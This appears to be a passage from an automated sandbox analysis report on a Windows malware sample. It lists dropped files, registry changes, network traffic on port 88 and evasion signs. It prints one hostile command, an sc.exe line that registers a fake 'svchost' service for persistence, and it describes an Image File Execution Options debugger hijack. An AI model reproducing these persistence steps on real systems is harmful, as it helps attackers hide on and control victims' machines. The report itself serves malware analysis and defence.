Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1040\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1036\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1031\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\3082\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1049\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File created: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\license.rtf

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Program Files (x86)\WinPcap\install.log

Jump to behavior

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\System32\reg.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe Debugger

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\WinPcap Web Site.url	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\Uninstall WinPcap 4.1.3.lnk	Jump to behavior

Source: C:\Windows\System32\reg.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SecHealthUI.exe Debugger

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NPF

Jump to behavior

Source: C:\Windows\SysWOW64\RuntimeBroker.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" create svchost binPath= C:\Windows\SysWOW64\RuntimeBroker.exe start= auto DisplayName= svchost

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 88
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 88 -> 49769

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe TID: 6344	Thread sleep time: -82000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe TID: 6556	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe TID: 6720	Thread sleep count: 57 > 30
Source: C:\Windows\System32\svchost.exe TID: 6576	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\RuntimeBroker.exe TID: 7060	Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\RuntimeBroker.exe TID: 7060	Thread sleep count: 135 > 30

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012AF195 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 012AF236h		32_2_012AF195
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012AF195 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 012AF22Fh		32_2_012AF195

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Window / User API: threadDelayed 585

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_31-2922
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT username FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT username FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Analysis.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Packets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinPcap\WinPcapInstall.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinPcap\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Dropped PE file which has not been started: C:\4863269369430a9b27\SetupUi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Program Files (x86)\WinPcap\rpcapd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Dropped PE file which has not been started: C:\4863269369430a9b27\SetupEngine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Dropped PE file which has not been started: C:\4863269369430a9b27\Setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\install_wim_tweak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\System32\wpcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Base.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Dropped PE file which has not been started: C:\4863269369430a9b27\sqmapi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\System32\Packet.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\Packet.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.Extensions.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\pthreadVC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\SysWOW64\wpcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.be\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Dropped PE file which has not been started: C:\Windows\System32\drivers\npf.sys	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Registry key enumerated: More than 303 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Evaded block: after key decision

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	API call chain: ExitProcess graph end node			graph_31-2883
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULL

Source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: install_wim_tweak /c Microsoft-Hyper-V-Common-Drivers-Package
Source: svchost.exe, 00000021.00000002.493981813.0000020AC4664000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW(@
Source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: install_wim_tweak /c Microsoft-Hyper-V-Common-Drivers-Package,SeCreateTokenPrivilege:SeAssignPrimaryTokenPrivilege*SeLockMemoryPrivilege0SeIncreaseQuotaPrivilege6SeUnsolicitedInputPrivilege2SeMachineAccountPrivilege
Source: svchost.exe, 00000016.00000002.491678472.000001FF86402000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000021.00000002.493951067.0000020AC4658000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000021.00000002.492199193.0000020ABF02A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`bf
Source: RuntimeBroker.exe, 0000002B.00000002.492914508.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllptW
Source: ywvz5i8kT9.exe, 00000000.00000002.496690349.000000001DB90000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.491958332.000001FF86428000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.492172371.00000153B0A44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.492577115.000001F855829000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\RuntimeBroker.exe

Process information queried: ProcessInformation

